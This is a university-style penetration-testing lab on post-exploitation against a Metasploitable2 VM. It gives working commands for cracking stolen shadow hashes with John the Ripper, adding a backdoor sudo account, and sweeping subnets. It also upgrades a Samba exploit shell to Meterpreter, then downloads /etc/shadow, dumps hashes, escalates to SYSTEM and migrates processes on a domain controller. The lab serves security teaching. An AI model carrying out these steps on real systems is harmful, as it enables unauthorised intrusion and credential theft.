Post-Exploitation – Lab

Hacking 101 Post-Exploitation

Prereq – Have a local instance of Kali running and finish the Metasploit lab.

https://hack.technoherder.com/vm-setup-kali-metasploitable2/

https://hack.technoherder.com/metasploit-2/

Part 1 – John the Ripper

Let’s say you have password hashes from an earlier exploit. (Such as the password hashes obtain in the Metasploit Lab).  While that was helpful by itself to see what usernames exist, it would be much more useful to have plaintext passwords, which could then be used to log onto other unexploited systems.  How can password hashes be converted to plaintext passwords?

John the Ripper is a password “security auditing and password recovery” tool that can also be used for brute force password cracking from hashes. This process can be much faster than network-based attacks that were tried previously with Hydra.  There’s no network delay waiting for the target response, no need to worry about overloading the target or setting off security alarms, and the hashing attempts can be heavily parallelized.

Run John the Ripper on the hashes you swiped from Metasploitable2. (Recall that back in Lab 5 you swiped the /etc/passwd and /etc/shadow files and then used the unshadow tool to merge those files into a single file.)  John the Ripper has a bunch of rules for common password permutations based on usernames – maybe some of those will hit?  Start with the SINGLE CRACK rule. This is for idiot passwords based on the login/GECOS information, but you might get lucky, and it’s super fast to start with.

# Just to see all the different permutations possible
$ john --list=rules   
$ john --single metasploitable_logins.txt

Note that you don’t have to provide a file in the “shadow” format – John the Ripper is perfectly capable of recognizing a wide variety of hash standards in a file with contents as simple as username:hash.

Deliverables:

  • What is the password of the user user?
  • What is the password of the msfadmin user?
  • What is the password of the service user?

We’re making progress, but that didn’t guess passwords for all of the accounts.  Now run John the Ripper using a basic list of common passwords that ships with John.

$ john --wordlist=/usr/share/john/password.lst --rules metasploitable_logins.txt

Deliverables:

  • What is the password of the ‘sys’ user?
  • What is the password of the ‘klog’ user?

Note: John the Ripper is smart. If you re-run the command again over the same input file, it won’t bother running the same tests or trying to find passwords for usernames that it already knows.  These are saved in ~/.john/john.pot.  So, you can easily try multiple wordlists (e.g. small, medium, large, MASSIVE) and more complicated rules (i.e. permutations) on the same hashes.

If you want to see all the results of the password cracking on the file, and not just the most recent scan, do:

# This will show results in the "passwd" format:
# username : password :  UsedID : GroupID : User Info : Home Directory : Default Shell
$ john --show metasploitable_logins.txt

Just the root password is left as a mystery…  I tried the 134MB rockyou.txt wordlist (uncompressed from /usr/share/wordlists/rockyou.txt.gz), but without success.  Some googling seems to indicate that this password is significantly harder to crack than the others.

Note that these are relatively short username and password lists to go quickly.  Metasploit comes with other files to choose from (see /usr/share/metasploit-framework/data/wordlists/) and any Pen Tester worth his or her salt will have their own curated password lists.

See Also: CrackStation.net has a 15GB (uncompressed) wordlist file:  https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

You can keep track of these credentials in Metasploit using the creds command.  Add your best credential now (the msfadmin one, since we know it has sudo access) using the ‘creds add’ command.  You will need to specify the username, password, and IP address/port/protocol/service that the login is for.

# Ensure PostgreSQL database is running
$ sudo service postgresql start

# Launch Metasploit Console
$ msfconsole

# Continue using the workspace from the last lab:
msf6> workspace 178-metasploitable2

msf6> creds add user:msfadmin password:XXXXXX address:xx.xx.xx.xx port:22 protocol:tcp service-name:ssh

Then you can search the credentials database later, either by host or by service.

msf6> creds -s ssh
msf6> creds xx.xx.xx.xx

Part 2 – Useful Post-Exploit Activities

After gaining shell access, you may want to perform some common tasks, like create a user account for you own use (rather than needing to use a fragile exploit for access each time).  Or such as scan the network for other hosts that may be investigated next.   This is referred to as enumeration.  (See:  Linux Enumeration Cheat Sheet)

Perform the following tasks on the Metasploitable2 VM via an exploit shell (any exploit will do). For each of these tasks, use only the software that is already present on the system.  You are not allowed to use apt to install anything on the system.

Deliverables:

  • For each task below, document each command or set of commands that you use.  Don’t be alarmed if the auto-grader isn’t aware (yet!) of all the diversity of commands possible here.

Tip: Feel free to just log onto Metasploitable2 and try these out at the terminal.  However, all of your answers must be runnable via the exploit shell, so test them at the end to make sure.

Warning:  The installed programs and configuration is different between your Kali Linux and Metasploitable2 Linux VMs.   Ensure that your commands actually work in the Metasploitable2 VM and accomplish the desired result!

Task 1: Grant Yourself Access: Get a list of all local users

Task 2: Grant Yourself Access: Get a list of all users with sudo access (i.e. root access).  Note that, in Metasploitable2, the relevant group is called “admin”, whereas in some other Linux distributions the relevant group is called “sudo”

Task 3: Grant Yourself Access: Create a new account with the username “tiger” and password “roar”

Task 4: Grant Yourself Access:  Grant the “tiger” account sudo permissions

Task 5: Revoke Access: Remove sudo permissions from “tiger”

Task 6: Revoke Access: Remove the user “tiger”

Task 7: Revoke Your Access: Remove the group “tiger”

Task 8: Find out what shell you are running in via the exploit

Task 9: Do a network scan to detect other active hosts within a specific subnet that respond to ICMP pings. The intent in a pentest would be to scan inside the corporate network from your pivot machine. But since we don’t have a virtual network at the moment, we’re going to use a Pacific subnet instead.  For testing, use either the 138.9.110.0/24 subnet (when off-campus) or 10.10.4.0/24 subnet (when on-campus). Note that you are not allowed to use nmap for this, since Nmap won’t be installed on many exploited systems.

Tip: This may be easier to write as a tiny shell script rather than a fancy one-line command…_

Task 10: Do a reverse DNS scan to find the hostnames for other hosts within the subnet use used above (either 138.9.110.0/24 or 10.10.4.0/24). The intent in a pentest would be to scan inside the corporate network from your pivot machine. But since we don’t have a virtual network at the moment, we’re using this Pacific subnet instead.  Note that you are not allowed to use nmap for this, since Nmap won’t be installed on many exploited systems.

Tip: This may be easier to write as a tiny shell script rather than a fancy one-line command…_

Part 3 – Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Let’s upgrade our shell with Meterpreter!

Reference: Upgrade a Normal Command Shell to a Metasploit Meterpreter

Continue using the workspace from the last lab:

msf6> workspace 178-metasploitable2

Use the Samba exploit from the last lab:

msf6> search type:exploit name:samba
msf6> use exploit/multi/samba/usermap_script
msf6> info
msf6> set RHOST xx.xx.xx.xx

What payloads are available for this exploit?

msf6> show payloads

Hmmmn, no Meterpreter available.  Well, let’s achieve it via a two step process.  You can leave the payload as automatically selected here.

msf6> exploit
whoami
root

Now that you have a shell on the Metasploitable2 VM, send it to the background via CTRL-Z and enter y to put it in the background

Search for a post-exploit script to upgrade a shell to a Meterpreter shell, and then select it.

msf6> search shell_to_meterpreter
msf6> use post/multi/manage/shell_to_meterpreter

Learn more about this post-exploit script and the options it needs set:

msf6> info

Of the options that this post-exploit script takes, the only missing one (that is required) is SESSION, which is the session to run this script on.  What are our current sessions?  (Should only be one, the one we just sent to the background)

# where x = num of session you just backgrounded
msf6> sessions
msf6> set SESSION x    

Run this post-exploit script

# Exploit runs...
msf6> exploit

To use the new Meterpreter shell, get the list of sessions again. You should see a new session.

msf6> sessions

Deliverables:

  • What is the “type” listed for this new session?
  • What username is meterpreter running as on the remote system?
  • What does that username mean in terms of our access to this system?

To interact with this new shell, use the “-i” flag for sessions:

# where x = num of Meterpreter session you just created
msf6> sessions -i x        

Let’s explore the capabilities of Meterpreter now that it’s running on the Metasploitable2 VM.

View the help menu

meterpreter>  ?

Obtain some high level information about the system Meterpreter is running on:

meterpreter> sysinfo

Deliverables:

  • What is the OS reported?
  • What is the (processor) architecture reported?

Browse the list of running processes to get a sense of what is running on the system.

meterpreter> ps

Deliverables:

  • What is the process ID of Xtightvnc? (A VNC server)

Download the /etc/passwd and /etc/shadow files from Metasploitable2 to your Kali machine and save them in the /tmp directory, thus demonstrating yet another way to access files on the remote host.

meterpreter> download /etc/passwd /etc/shadow /tmp

Note: There’s an UPLOAD command too!

Snoop through the ARP cache of the target host. This represents other systems on the local area network that the target has been in recent communication with. You might discover other systems worth examining next.

meterpreter> arp

To exit the meterpreter shell:

meterpreter> quit

Keep your original exploit shell running a little while longer…

Deliverables:

  • What is the contents of the ARP cache? (Copy and paste in the table)

Part 4 – Post-Exploit Script

Metasploit has a number of “post-exploit” scripts that can be useful for data gathering purposes.  What other post-exploit scripts exist for our Linux target?

msf6> search type:post platform:linux

Some (many?) of these look interesting, depending on what applications you think are running on the target system:

# ANOTHER way to get those password hashes
msf6> info post/linux/gather/enum_system
msf6> info post/linux/gather/enum_users_history
msf6> info post/linux/gather/hashdump     

Deliverables:

  • Use the hashdump post-exploit script to access the password hashes.  (Tip: Does it require any environment variables to be set before running?)  Where does the “unshadowed password file” get downloaded to on your local Kali system?
  • Use the enum_system post-exploit script to access installed packages and services, log files, cron jobs, and other interesting system artifacts. What is the package version of the Apache Tomcat 5.5 engine that is installed?  (According to the Ubuntu/Debian package manager labeling)
  • Use the enum_users_history post-exploit script to access shell history, command history for various SQL servers, and the sudoers file, among other artifacts. What is the name of the configuration file that the “postgres” user edited using the “vim” text editor?  (There are two files, either is acceptable)

Tip: Forget which artifact file contains what information?  Do you want to see them in an organized list, preferably sorted/searchable by host?  These scripts have been saving that information for you automatically.

msf6> loot

To exit your original exploit shell:

# Where x = num of your original exploitmsf6> CTRL-C, followed by 'y' when prompted to Abort Session?
msf6> sessionsmsf6> sessions -i  x             

Post-Exploit – (Extra notes, different lesson…)

Now that you have initial access to the system, take advantage of it.

Upgrade your shell to Meterpreter.

# Where <num> is session you JUST backgrounded
msf6> search shell_to_meterpreter
msf6> use post/multi/manage/shell_to_meterpreter
msf6> options
msf6> set SESSION <num>   
msf6> exploit   
# Should see "Meterpreter session <num> opened"
msf6> sessions

Take a screenshot at this point as a deliverable.

Connect to that active Meterpreter session on the domain controller.

# Where <num> is NEW meterpreter session
msf6> sessions -i <num>   

There’s lots of fun things to do here!

# Where am I running?  Should be domain controller
meterpreter>  sysinfo    

# See what permissions we have
meterpreter>  getprivs   

# Process list
meterpreter>  ps         

# Ensure we're escalated to SYSTEM access, it not already
meterpreter>  getsystem 

# Migrate to another process - Look for vds.exe and use its PID
meterpreter>  migrate <pid>  

# Dump hashes for cracking
meterpreter>  hashdump

These password hashes are perfect for brute forcing, and are also useful for Windows pass-the-hash attacks (where you don’t need the original password, just the hash will suffice).

Background the meterpreter shell on the domain controller:  CTRL-Z, then y

Leave a Reply

Your email address will not be published. Required fields are marked *